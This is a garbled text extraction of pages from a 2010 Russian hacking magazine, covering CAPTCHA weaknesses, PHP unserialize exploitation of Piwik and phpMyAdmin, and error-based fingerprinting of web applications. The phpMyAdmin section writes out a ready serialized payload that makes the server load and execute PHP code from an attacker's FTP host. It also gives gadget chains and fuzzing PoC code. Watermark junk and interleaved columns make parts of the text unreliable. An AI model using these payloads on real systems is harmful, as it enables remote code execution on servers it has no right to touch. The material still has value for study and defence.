Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

135_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

15.43 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 56 / 156 7 8 9 10 11 12 13 14 15 > Следующая >>>

hang

NOW!

BUY

w Click

-xcha

-x cha

Интересныекапчи

RECAPTCHA Тем, кто хочет воспользоваться готовым решением, можно посоветовать использовать reCAPTCHA (recaptcha.net). reCAPTCHA

помимо защиты сайта от роботов выполняют другую полезную функцию — помогает оцифровывать бумажные книги. Капча состоит из двух слов, одно из которых уже было распознано ранее, а второе не смогла распознать система оцифровки книг. Пользователь, разумеется, не знает, какое слово неизвестно системе, поэтому вынужден вводить оба. reCAPTCHA хороша тем, что использует слова, которые ранее не прошли через систему распознавания, т.е. для ее взлома как минимум придется переплюнуть серьезную коммерческую OCR-систему. Ко всему прочему, reCAPTCHA использует дополнительные шумы и искажения, которые периодически меняются. Недостаток у reCAPTCHA только один — она очень популярна, соответственно и интерес к её взлому очень большой.

ТРЕХМЕРНАЯ

КАПЧА Создатели этой капчи

(ocr-research.org.ua) уверены в ее стойкости. Разумеется, стандартные системы распознавания текста с ней не справятся, но при индивидуальном подходе можно найти ряд уязвимостей. Во-первых, символы расположены на одинаковом расстоянии друг от друга и находятся на одной линии (в трех-

мерном пространстве). Во-вторых, легко

заметить, что торцы выпуклых символов состоят из многоугольников, по площади больших, чем многоугольники остальной поверхности. Эти многоугольники легко найти программно, а вместе они формируют отчетливые контуры символов. На основе контуров символов можно определить углы, на которые была повернута плоскость, и развернуть её обратно. После этого можно проводить распознавание каждого отдельного символа с помощью нейронной сети. Так как эта капча не очень популярна, можно считать её достаточной для ресурсов, не представляющих особый интерес для спамеров.

КАПЧА С ВИРТУАЛЬНОЙ

КЛАВОЙ Очень хорошая капча до недавнего времени была у сервиса mail.ru. Капча состоит из нескольких символов некоторого периодически изменяемого алфавита. Пользователь вводит ответ с помощью виртуальной клавиатуры. Основное преимущество такой капчи — очень хорошая стойкость к ручному распознаванию «китайцами». Дело в том, что сервисы, предлагающие ручное распознавание, работают по принципу: отправил картинку, получил ответ в текстовом виде. Для ручного распознавания потребовалось бы создание специального интерфейса для передачи помимо изображения ещё и виртуальной клавиатуры. Кроме того

ввод этой капчи занимает больше времени, чем ввод большинства других, потому что определять непривычные для глаза символы сложнее, чем символы латинского алфавита или цифры. Таким образом увеличивается стоимость ручного распознавания. Автоматическое распознавание также затруднено: постоянная смена символов не позволит хорошо обучить нейросеть, а также сами символы трудно отделить друг от драга. Основной недостаток — сложность ввода для обычного пользователя, возможно, по этой причине в mail.ru от нее и отказались.

АНИМИРОВАННАЯ

КАПЧА Интересный вариант капчи предложил Нилой Митра из Института технологий Дели (видео —

brightcove.newscientist.com/services/player/ bcpid2227271001?bctid=47814603001). На основе трехмерной анимированной модели некоторого объекта (например, бегущей лошади) создается анимация, на которой объект покрыт случайно изменяющимися пятнами. Кроме того схожими пятнами покрыт и весь фон. На основе одного кадра распознать объект может быть трудно, но в динамике на это уходит пара секунд. Автоматическое распознавание на данный момент крайне затруднено — при таком количестве шума очень трудно определить, какие из этих пятен должны формировать образ. Казалось бы, очень перспективное направление, однако у капчи есть серьезный недостаток. Для её использования потребуется создание базы анимированных моделей, на каждую из которых придется затратить значительное количество времени, иначе можно будет просто угадывать ответ многочисленными попытками. Кроме того, если каждый раз не генерировать новую анимацию (что дает большую нагрузку на процессор), можно будет сохранять хеши распознанных вручную изображений. Также эта капча никак не защищена от сервисов, предлагающих ручное распознавание.

XÀÊÅÐ 04 /135/ 10

049

hang

NOW!

w Click

BUY

ВЗЛОМ

Маг icq 884888, http://snipper.ru

-xcha

UNSERIALIZE ÁÀÃВКАРТИНКАХ

ОШИБКИ ДЕСЕРИАЛИЗАЦИИ КЛАССОВ НА ЖИВЫХ ПРИМЕРАХ

Приветствую тебя, читатель! В январском номере ][ мы подробно рассмотрели один из новейших багов в PHP от известного специалиста по информационной безопасности Стефана Эссера. Как ты наверное помнишь, баг заключается в небезопасном спользовании функции unserialize применительно к объектам. В прошлой статье я говорил о том, что данное исследование направлено на будущее, так как в реальных веб-приложениях более или менее серьезные уязвимости десериализации пока не были обнаружены. И вот… Будущее уже наступило! Пришла пора показать тебе подробный разбор таких багов в популярнейших скриптах Piwik и phpMyAdmin.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

НЕМНОГО О PIWIK

Для начала расскажу тебе немного о Piwik.

Итак, Piwik — это бесплатный скрипт веб-аналитики, позиционируемый как опенсорсная замена Google analytics. Эта система выросла из менее навороченного скрипта phpMyVisites (phpmyvisites.us).

Функционал Пивика впечатляет: продвинутая система плагинов (похожая на аналогичную в WordPress), удобный API (ты можешь получать любую инфу из базы данных в форматах xml, json, php, csv), интерфейс юзера, основанный на виджетах (с drag and drop-примочками), перевод на множество языков, real time-репорты и многие другие фичи уже сделали этот скрипт мегапопулярным среди веб-мастеров (только последнюю версию скачали около 250 тысяч раз).

Популярность скрипта подтверждают те факты, что Piwik несколько раз становился проектом месяца на sourceforge.net и выигрывал премию "Infoworld Bossie Award" как лучшее опенсорсное программное обеспечение. Я могу еще долго описывать все преимущества скрипта, но настало время рассказать о природе unserialize бага в Piwik.

ZEND FRAMEWORK

Как ты уже знаешь, Стефан Эссер в своей презентации приводил теоретические примеры выполнения произвольного PHP-кода в Zend Framework и писал о том, что сам фреймворк не подвержен уязвимости — уязвимы лишь те приложения, которые его используют вкупе с недостаточной проверкой данных в функции unserialize().

Как оказалось, Piwik как раз-таки и является тем самым приложением :) Теперь давай проследим за реверсингом скрипта, который провел сам

Эссер (качай по ссылке в сносках последнюю уязвимую версию 0.4.5 из архива релизов).

Открывай файл ./core/Cookie.php и находи следующую функцию:

protected function loadContentFromCookie()

{

$cookieStr = $_COOKIE[$this->name]; $values = explode(

self::VALUE_SEPARATOR, $cookieStr); foreach($values as $nameValue){

...

if(!is_numeric($varValue)){

$varValue = base64_decode($varValue); // some of the values may be serialized

array so we try to...

if(($arrayValue=@unserialize($varValue)) !==false

// we set the unserialized version only for arrays...

&& is_array($arrayValue)

)

{

$varValue = $arrayValue;

}

...

}

050	XÀÊÅÐ 04 /135/ 10

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P

				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

первоначальноеadvisory вphpMyAdmin

Как видно, здесь Пивик получает контент из куков, которые передает пользователь, и разбирает их на запчасти:

•значение кукиса разбивается по знаку "=", первая часть

— имя переменной, вторая — значение;

•далее значение переменной пропускается через base64_decode() (что, кстати, помогает безболезненно передавать нулл-байт) и через нужную нам функцию unserialize().

Эта функция юзается практически в любом месте скрипта (например, для авторизации по кукам) и доступна любому удаленному пользователю, так что нам осталось только найти путь к опасным функциям в Zend Framework. Двигаем дальше :)

РЕВЕРСИНГ

Если ты читал оригинальный PDF Эссера, то должен помнить, что наиболее удобным классом для выполнения произвольного кода во фреймворке является Zend_Log. Так что ищем и находим этот класс в ./libs/Zend/Log.php и смотрим на его деструктор:

public function __destruct()

{

foreach($this->_writers as $writer) { $writer->shutdown();

}

Здесь деструктор в цикле выполняет некий метод shutdown() из классов, перечисленных в массиве _writers. Далее нужно найти полезный нам shutdown-метод. И

таковой находится в ./libs/Zend/Log/Writer/Mail.php:

public function shutdown()

{

...

if (empty($this->_eventsToMail)) { return;

}

...

if ($this->_layout) {

...

//If an exception occurs during rendering, convert it to a notice

//so we can avoid an exception thrown without a stack frame.

try { $this->_mail->setBodyHtml($this->_

layout->render());

} catch (Exception $e) {

...

try { $this->_mail->send();

} catch (Exception $e) {

...

установочныйскриптphpMyAdmin		HTTP://WWW
установочныйскриптphpMyAdmin		HTTP://WWW
		links

}	• piwik.org — офици-
...	альныйсайтPiwik
}	• builds.piwik.org/?
	C=M;O=D — архив
Этот шатдаун-метод проверяет, есть ли некие события,	релизовPiwik
которые еще не были отправлены по указанному в свой-	• suspekt.org/2009/
стве адресу e-mail. Если такие находятся, то он отправля-	12/09/advisory-
ет их. Эта фича позволяет любому взломщику рассылать	032009-piwik-
спам через тот же самый unserialize-баг.	cookie-unserialize-
Спам-баг, конечно, может быть интересен определенному	vulnerability — Piwik
кругу читателей, но мы со Стефаном не останавливаемся	Cookie unserialize()
на достигнутом и идем дальше :). Теперь нам необходимо	Vulnerability
найти классы, использующие метод render. Наиболее	• framework.zend.
полезный из таковых оказывается в классе Piwik_View из	com/download — офи-
файла ./core/View.php:	циальнаястраница
	Zend Framework
public function render()	• smarty.net —
{	официальныйсайт
try {	Smarty
...	• php.net/call_user_
} catch(Exception $e) {	func_array — опи-
// can fail, for example at	саниефункцииcall_
installation (no plugin loaded yet)	user_func_array()
}	• suspekt.org/
...	downloads/Piwik_
return $this->smarty->fetch($this-	Smarty.txt — выпол-
>template);	нениепроизвольного
}	кодавPiwik через
	Smarty
Как пишет сам Эссер, этот метод делает кучу интересных	• suspekt.org/
вещей, которые могут быть проигнорированы, и в конце	downloads/Piwik_
вызывает известный шаблонный движок Smarty для рен-	Config.txt — запись
деринга темплейта.	произвольныхфай-
ОПАСНЫЙ SMARTY	ловвPiwik
ОПАСНЫЙ SMARTY	• gnucitizen.org/
Известно, что Smarty может выполнять PHP-код в тем-	static/blog/2009/06/
плейтах, поэтому мы и выбрали для дальнейшего иссле-	phpmyadminrcesh.
дования этот класс.	txt — phpMyAdmin '/
Итак, смотрим на указанную выше функцию fetch() в ./libs/	scripts/setup.php'
Smarty/Smarty.class.php:	PHP Code Injection
	RCE PoC v0.11
function fetch($resource_name, $cache_id =	• snipper.ru/view/12/
null, ...)	phpmyadmin-
{	2119-unserialize-
...	arbitrary-php-code-
if ($display && !$this->caching &&	execution-exploit
count($this->_plugins['outputfilter']) ==	— мойэксплойтдля
0) {	phpMyAdmin <= 2.11.9
if ($this->_is_compiled($resource_	• forum.antichat.ru/
name, $_smarty_compile_path)	thread99589-file_
\|\| $this->_compile_	exists.html — обход
resource($resource_name, $_smarty_compile_	ограниченийfile_
path))	exists спомощьюftp
{
include($_smarty_compile_path);

XÀÊÅÐ 04 /135/ 10

051

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

интерфейсPiwik

advisory кПивикуотСтефана Эссера

}

} else {

...

Здесь имя шаблона подставляется в метод

_compile_resource для компиляции:

function _compile_resource( $resource_name, $compile_path)

{

$_params = array('resource_name' => $resource_name);

if (!$this->_fetch_resource_ info($_params))

{

return false;

}

Перед компиляцией методом _fetch_ resource_info получается расширенная информация о ресурсе:

function _fetch_resource_info( &$params)

{

...

switch ($_resource_type) { case 'file':

...

break;

default:

// call resource functions to fetch the template source and

timestamp

if ($params['get_source'])

{

$_source_return = isset($this->_plugins['resource'] [$_resource_type]) && call_ user_func_array($this->_ plugins['resource'][$_resource_ type][0][0], array($_resource_ name, &$params['source_content'], &$this));

...

}

Бинго! С помощью стандартной PHP-функции call_user_func_array мы сможем выполнить любую другую callback-функцию :).

ВЫПОЛНЕНИЕ ÊÎÄÀ

Вданном примере функция call_user_func_ array вызывается с двумя параметрами: имя вызываемой callback-функции и массив с тремя параметрами, которые передадутся в коллбэк.

Вконтексте выполнения произвольного PHPкода здесь сразу встают две проблемы:

1. eval(), обычно применяемый для сабжа, является конструкцией языка, а не функцией, то есть его невозможно вызвать через call_user_func_array;

2. assert() (как замена eval) уже является функцией, но ее вызов выдаст ошибку, так как коллбэку передаются 3 параметра, а assert принимает лишь один.

Из-за этих ограничений Стефану пришлось придумать небольшой трюк, который заключается в использовании встроенного в

Smarty враппера для eval:

function _eval(

$code, $params=null)

{

return eval($code);

}

Хотя эта функция по определению принимает лишь 2 параметра, ей возможно передать и большее их количество.

Причиной этого является тот факт, что по дефолту пользовательские функции в PHP, в отличие от внутренних, могут оперировать произвольным числом параметров.

Теперь нам осталось лишь собрать в единый эксплойт все результаты реверсинга, что Стефан Эссер уже сделал (ссылку ищи в сносках).

В сплойте сериализуются все перечисленные выше классы и необходимые им методы, затем полученное значение пропускается через base64_encode и, на основе его, формируется evil-кукис, который ты сможешь скормить своему браузеру и наслаждаться результатами выполнения произвольного

PHP-кода в Piwik.

Также советую обратить внимание на еще один эксплойт по ссылке в сносках, где Эссер проворачивает еще один трюк с unserialize в Пивике и записывает произвольные файлы в

произвольное место системы.

ПОТРОШИМ PHPMYADMIN

Теперь небольшой бонус от меня :). Если ты следишь за лентами эксплойтов, то, наверняка, не должен был пропустить уязвимость популярнейшего менеджера баз данных MySql phpMyAdmin версий до

2.11.9 (ссылку на сплойт, как всегда, ищи в сносках). Уязвимость заключалась в том, что скрипт установки ./scripts/setup.php вообще не проверял пользовательские данные, которые затем записывались в конфигурационный файл. Эксплойт был всем хорош, за исключением того, что администратор уязвимого хоста должен был вручную создать директорию ./config и дать ей права на запись (именно туда должен был записываться ядовитый конфиг), что на практике встречалось крайне редко. Настало время исправить это недоразумение.

Итак, ./scripts/setup.php — единственное место в скрипте, где используется наша любимая функция unserialize:

if (isset($_POST['configuration']) && $action != 'clear')

{

// Grab previous configuration, if it should not be cleared

$configuration=unserialize( $_POST['configuration']);

}

Как можно видеть, параметр $_ POST['configuration'] перед вставкой в unserialize() никоим образом не проверяется, так что мы вполне можем поискать интересные реализации волшебных методов

__wakeup и __destruct. Очень полезный нам вэйкап-метод находится в ./libraries/Config. class.php:

function __wakeup() {

if (! $this->checkConfigSource()

052	XÀÊÅÐ 04 /135/ 10

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P

				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ядовитыекукисы, позволяющиевывестинаэкранphpinfo() вPiwik

||$this->source_mtime !== filemtime($this->getSource())

||$this->default_source_mtime !== filemtime($this->default_source)

||$this->error_config_file

||$this->error_config_default_file) { $this->settings = array(); $this->load(); $this->checkSystem();

}

...

}

В данном методе происходит много чего интересного, но сейчас нас интересует функция load(). Находим ее в том же файле:

function load($source = null)

{

...

if (! $this->checkConfigSource()) { return false;

}

...

if (function_exists('file_get_contents'))

{

$eval_result = eval('?>' . trim(file_get_contents(

$this->getSource())));

} else

{

$eval_result = eval('?>' . trim(implode("\n",

file($this->getSource()))));

}

...

}

Надеюсь, что ты увидел здесь eval-конструкцию, которая позволит нам выполнить любой PHP-код и в которую мы сможем вставить все что угодно :). Сделать это позволит простенький метод getSource и обход ограничений безо-

пасности в методе checkConfigSource:

function getSource() { return $this->source;

}

...

function checkConfigSource() {

...

if (! file_exists($this->getSource()))

{

...

return false;

}

if (! is_readable($this->getSource())) {

ядовитыекукисысделалисвоедело:)

...

die('Existing configuration file (' . $this->getSource() . ') is not readable.');

}

...

$perms = @fileperms($this->getSource()); if (!($perms === false) && ($perms & 2))

{

...

die('Wrong permissions on configuration file, should not be world writable!');

}

return true;

}

Последний метод выполняет всяческие проверки с тем файлом, который, по идее, должен быть конфигурацион-

ным. Функции file_exists(), is_readable() и fileperms() изна-

чально были призваны помешать вставить в нужный нам file_get_contents() удаленный URL с PHP кодом на выпол-

нение. Здесь кроется один нюанс. Начиная с PHP 5, все перечисленные функции вполне отлично работают с про-

токлом ftp, то есть конструкция вида file_exists('ftp://ftp.com/ shell.txt') вернет true. С обычным http нам вряд ли бы такое удалось. Исходя из всего написанного выше, уже можно составить ядовитое значение, которое будет передаваться в unserialize, для уязвимого параметра $_POST['configuration'] (устанавливаем только свойство "source"):

O:10:"PMA_Config":1:{s:6:"source";s:70:"ft p://login:password@tvoy_host.com/www/shell. txt";}

Чтобы вывести на экран phpinfo(), файл shell.txt на твоем ftp-хосте должен иметь значение "<? phpinfo();exit; ?>" (exit; в конце обязательно, иначе скрипт вылетит с "Fatal error"). Удобный эксплойт для этой баги также ищи в сносках.

EPIC WIN

Уязвимости, основанные не на невнимательности программистов, а на особенностях самого PHP, о которых не все знают, набирают силу! С каждым днем их появляется все больше и больше. Этот факт заставляет нас гораздо глубже анализировать свой (и чужой :) код и учиться лучше понимать саму природу информационной безопасности. А я надеюсь, что ты, изучив вместе со мной по шагам всю подноготную unserialize-бага от Стефана Эссера, сам захочешь принять участие в пентестинге известных движков. Увидимся в следующих номерах! z

INFO

info

Советуюпрочитать отличнуюзаметкуна темунашейстатьи

вблогеRaz0r'аraz0r. name/obzory/novye- sposoby-obxoda-waf- i-php-eksploity. Тут тытакженайдешь неплохойанализ unserialize-бага

внелицензионных версияхфорума vBulletin, который,

ксожалению, позволяетвыполнить лишьфункциибез параметров.

XÀÊÅÐ 04 /135/ 10

053

hang

NOW!

BUY

w Click

ВЗЛОМ

Владимир d0znpp Воронцов http://oxod.ru

ГЮЛЬЧАТАЙ,

-xcha

ОТКРОЙ ЛИЧИКО

ПОЛУЧЕНИЕ ИНФОРМАЦИИ О ВЕБ-ПРИЛОЖЕНИИ НЕТРАДИЦИОННЫМИ СПОСОБАМИ

Сегодня я хочу рассказать тебе о некоторых особенностях функционирования веб-приложений, которые могут повлиять на их безопасность.

Прежде всего, предлагаю обратить внимание на различия между терминами «безопасность сайта» и «безопасность системы управления сайтом».Хотя эти вещи и взаимосвязаны, но, как показывает практика — они всего лишь

пересекающиеся множества. Пентестер методом «черного ящика» может выявить недостатки CMS, на которой этот работает сайт, а может и не выявить. Как повезет.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

НИКОГДА НЕ СДАВАЙСЯ	TIFF), я поставил его в цикл в многопоточ-	memory_limit
Немного лирики… Однажды мне довелось	ном режиме и стал собирать информацию.	pcre.backtrack_limit	(PHP>=5.2.0)
исследовать одну очень хорошо защищен-	Через непродолжительное время у меня	pcre.recursion_limit	(PHP>=5.2.0)
ную систему. Мозговые штурмы следовали	были ответы 11 различных типов, каждый из	post_max_size (PHP>=4.0.3)
один за другим и ничего не приносили, идеи	которых раскрывал имя и путь к своему клас-	upload_max_filesize
иссякали, а результат оставался практически	су. Второй раз счастье улыбнулось в гугле,	max_file_uploads (PHP>=5.2.12)
нулевым. Я начал писать разнообразные	когда оказалось, что один из этих классов

фаззеры, дергая то один, то другой скрипт в	доступен для скачивания на просторах Сети.	Здесь не все, но наиболее распространен-
надежде вытащить хоть что-нибудь, но все	После изучения исходника были выявлены	ные опции, что называется common :). Весь
было без толку. Однако, крылатая фраза на	слабые места и проведена атака переопре-	список опций (включая различные модули)
спичечном коробке с цаплей и лягушкой,	деления переменной с Register_Globals=ON.	можно найти на php.net/manual/en/ini.list.
покорившем сердца многих наших соотече-	Подбирать имя этой переменной, не видя	php. Искать по ключевым словам max, limit.
ственников, оказалась как всегда безуко-	исходников, можно было годами… Движок	Из всех параметров следовало выявить наи-
ризненно верной. В куче ответов сервера	сдался, а полезный опыт и побудил меня к	более применимые. Тут я руководствовался,
на разнообразные запросы в глаза броси-	написанию этой статьи.	прежде всего, универсальностью: хотелось
лись ответы аномально маленькой длины.	НАСТРОЙКИ PHP	найти параметры, которые удастся компро-
После более подробного их изучения стало		метировать на как можно более широком
ясно, что сервер периодически не успевал	После такого дебюта сразу стало интересно	спектре настроек PHP и веб-серверов. После
отрабатывать мои навороченные запро-	найти другие возможные пути к проведению	долгих мучений, описывать которые здесь
сы за max_execution_time и скрипт падал с	схожих атак. В настройках интерпретатора	не буду, оказалось, что самые пригодные
500-м статусом. Это было уже что-то, так как	PHP были выделены следующие опции:	к использованию — max_execution_time,
в ошибке содержались абсолютные пути и		memory_limit. Они выбрасываются в тело
имена скриптов на сервере. Выудив самый	max_execution_time	ответа при настройках error_reporting=E_
тяжелый для сервера запрос (им оказалась	max_input_nesting_level	ERROR или выше, и display_errors=On.
функция создания миниатюры из формата	max_input_time	Такое можно встретить в большинстве дефолт-

054	XÀÊÅÐ 04 /135/ 10

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Графикзависимостиразмераответаот	Ошибкаmax_execution_time
размерностимассивапеременнойGET. По
спадуопределяемmax_input_nesting_
level.

ных конфигов. Кроме того, варьируя значения переменных, можно добиться выпадания ошибок из различных мест приложения. В результате мы получим не только названия классов, скриптов, пути к приложению, но и понятие об иерархии вызовов внутри приложения. Но это еще не все данные, которые нужно иметь для начала работы.

ПОДГОТОВИТЕЛЬНЫЙ ЭТАП — URI MAX LENGTH И MAX_INPUT_NESTING_LEVEL

Для начала напишем простые скрипты для определения двух параметров сервера — максимальной длины GETзапроса и максимальной глубины вложенности входных данных. Зачем они пригодятся, будет рассказано дальше. Максимальная длина запроса устанавливается вебсервером, определить ее очень просто методом дихотомии (деления отрезка пополам). Код на PHP выглядит примерно так:

function fuzz_max_uri_len($url)

{

$headers = array(); $data = array();

$left = 500; //Значение левого края искомого диапазона

$right = 64000;//Значение правого края искомого диапазона

$accur = 5;//Точность, с которой определяем значение

while (($right-$left) > $accur){ $cur = ($right+$left)/2; $data['x'] = str_repeat("x",$cur);

list($h,$c,$t) = sendGetRequest($url, $headers, $data);

$s = intval(substr($h,9,3)); if ($s<400) {

$left=$cur;

}

else{ $right=$cur;

}

echo "\n$cur\t$s";

}

return(($right+$left)/2);

}

Второй необходимый параметр max_input_nesting_level

— свойство уже строго настройки интерпретатора, по

умолчанию равен 64. Это значение определяет максимальную размерность массива, которую может иметь переменная, приходящая от пользователя. Рассмотрим для примера вот такой код:

<?php echo $_GET[‘a’]; ?>.

В случае, если, max_input_nesting_level=1 и мы пере-

дадим в запросе ?a[][], на экране ничего не появится, в интерпретаторе возникнет ошибка уровня Notice, говорящая о том, что переменная не объявлена. Если же мы увеличим значение параметра до 2 и повторим запрос, на экране уже высветится «Array». Казалось бы, именно таков самый простой способ определить значение этого параметра — найти скрипт, который в явном виде выводит значение какой-нибудь пользовательской переменной и вызывать его, увеличивая вложенность, пока не исчезнет надпись Array. Такой поиск опять-таки стоит проводить методом дихотомии. Однако я попытался написать более универсальный алгоритм, который будет работать даже в случае, когда в ответ выводятся переменные, только косвенно зависящие от пользовательской. До сих пор не уверен в оптимальности выбранного алгоритма, так что представляю его на суд общественности :). Суть в том, чтобы постепенно увеличивать значение размерности массива и анализировать количество байт ответа. Если длина ответа отличается от предыдущего больше чем на какое-то пороговое значение, это считается аномалией и фиксируется в логе. Дополнив мой PoC нехитрой функцией построения графиков, я получил интересные картинки, которые представлены в сносках. В большинстве случаев, по спаду графика зависимости размера ответа от размерности массива и определяется значение параметра. Этот алгоритм пригодился мне и в дальнейшем, плюс я написал аналогичный статистический анализатор для времени ответа сервера.

ЧРЕЗМЕРНОЕ УПОТРЕБЛЕНИЕ ПАМЯТИ ВРЕДИТ ВАШЕМУ СКРИПТУ :)

Вернемся к нашей святой цели — спровоцировать ошибку

«Allowed memory size exhausted». В качестве самого триви-

ального примера, рассмотрим PHP-код <?php echo ‘OK’;?>. Казалось бы, какое тут потребление памяти?! На самом деле, такой скрипт может жрать мегабайты ОЗУ. И тут, не спорю, нет вины программиста, написавшего его. Для вывода размера используемой памяти в PHP служит

HTTP://WWW

links

oxod.ru — мойблог,

отвечаюнавопросы, пишупомересил. php.net — официальныйсайтинтерпретатора, сюдазапараметрамиконфига.

XÀÊÅÐ 04 /135/ 10

055

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha


		}
		}
		return intval($mem);
		}

		Теперь мы можем попытаться получить
		практическую пользу от всего написанного.
		Тут следует запастись удачей. Навскидку,
		без исходного кода, может быть непросто
		определить скрипты, которые любят память.
		Совет такой — ищи циклы с обработкой мас-
		сивов, рекурсии и всего такого же плана. В
		ряде случаев может оказаться, что лучшеи-
		спользовать POST, где существенно больше
		ограничения на длину передаваемых данных.
		Советую взять с диска мой PoC и посмотреть
		функцию fuzz_memory_usage(). Ее можно
		использовать для перебора переменных раз-
		личными методами (POST,GET,Multipart) и
		для выявления наиболее выгодных для выде-

		ления памяти комбинаций. Там же встроена
		проверка на аномальные длину и время
Графикзависимостивремениответа	отразмерностимассивапере-	ответа, так что, если долгожданная ошибка
		появится, ты ее не пропустишь.
меннойGET. Каквидно, зависимость	определяетсядалеконеразмер-
ностьюмассива:)		МЕДЛЕННЫЙ СКРИПТ —
	Как только размерность нашего массива	УЯЗВИМЫЙ СКРИПТ
	превысит его, потребление памяти будет	В отличие от потребления памяти, время
	равносильно случаю, когда мы вообще ниче-	выполнения скрипта зависит от нагрузки на
	го не передаем. Для эксперимента я про-	сервер и вообще является величиной, мягко
	верил, сколько же памяти будет потреблять	говоря, непостоянной. Заставить приложе-
	тривиальный скрипт, если нет ограничения	ние отрабатываться дольше, чем указано в
	на размерность массива. Оказалось, что при	параметре max_execution_time, непросто.
	запросе ?a([]x2500 раз) тривиальный скрипт	Есть даже класс уязвимостей в OWASP,
	ест около 1.2 Мб. Этого, конечно, слишком	называется «dead_code». Это ошибки раз-
	мало, чтобы вывалиться за memory_limit,	работчика, которые можно эксплуатировать
	но и скрипт наш не похож на реальное веб-	в целях взлома, например, для прово-
	приложение. Чтобы мониторить потребление	цирования ошибки превышения времени
	памяти любого приложения, можно написать	выполнения. Тестируя приложение или сайт,
	очень простой скрипт:	ты уже имеешь какое-то представление о
		том, какие запросы отрабатывают быстрее,
	<?php echo “marker:”.memory_get_	а какие медленнее, чем другие. Это, опять
ПримерPoC вработе. Перваяко-	usage().”#”; ?>	же, всевозможные циклы. Кстати, фильтры
лонка— размерответа, вторая—		безопасности часто грешат медленной ско-

времяответа, третья— итерация	и добавить его в директиву auto_append_file	ростью выполнения. Особенно это касается
впотоке. Трудятся20 потоков.	в php.ini. Теперь нетрудно написать функ-	фильтров, исправляющих запрос. Зная
	цию, которая будет искать в ответе сервера	как работает фильтр, можно скормить ему
	маркер и получать значение потребляемой	запрос, для приведения которого потребует-
функция memory_get_usage(). Предлагаю	памяти. Функция будет такая:	ся много итераций.
дописать ее к тривиальному скрипту и про-		Кроме того, опасны операции с файлами,
вести некоторые измерения. Для начала	function findMarker($content)	например, злоумышленник может попро-
вызовем наш скрипт не с переменной, a	{	бовать загрузить большой файл в несколько
методом GET. Потребление возрастет где-то	$p1 = strpos($content,	потоков. Если веб-приложение попытается
на 1 Кб. Интерпретатор уже выделил немного	"ONsec E500 mem:");	записать файл в то же место, куда еще не
памяти под значение переменной, поэтому,		дописался этот же файл от другого запроса,
если послать запрос «?a=aaa», потребление	if ($p1===false){	то оно несколько «промедлит». Но, опять же,
памяти не увеличится. Наша же задача —	return 0;	все зависит от используемых функций, ОС,
получить как можно больше выделенной	}	ФС, настроек и многих факторов. Вот общие
памяти при как можно более короткой длине	else {	рекомендации, которые можно дать для
GET-запроса (максимальное значение мы	$p2=strpos($content,"#",$p1);	поиска уязвимых скриптов. В общем случае,
уже получили и держим в уме). Попробуем	if ($p2===false){	постоянно увеличивая нагрузку на сервер,
теперь передать запрос с параметром ?a[],	return 0;	злоумышленник рано или поздно все равно
количество потребленной памяти увели-	}	получит то, на что рассчитывает. Конечно, и
чится уже примерно на 500 байт. Теперь в	else {	такие старания нетрудно пресечь, но это уже
игру вступает второй параметр, который был	$mem = substr($content,	выходит за рамки веб-приложения.
определен выше — max_input_nesting_level.	$p1+15,$p2-$p1-15);	Рассмотрим теперь живой пример на

056	XÀÊÅÐ 04 /135/ 10

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	отчетоработеPoC. Нашелза30 минут83 уровня	получаемзначениемаксимальнойдлиныGET за-
		проса.
	иерархии, и126 скриптов.

последней версии Битрикса и тестовой площадке. В системе были выявлены некоторые особенности, а именно:

1.При загрузке файла в качестве аватара, он помещается в директорию с трехсимвольным именем, диапазон символов хексовый

(16^3=4096).

2.При обновлении аватара, директория со старым аватаром удаляется.

3.При загрузке аватара с именем длиннее 250 символов, директория создается, а файл не загружается. Созданная таким образом директория уже не удаляется.

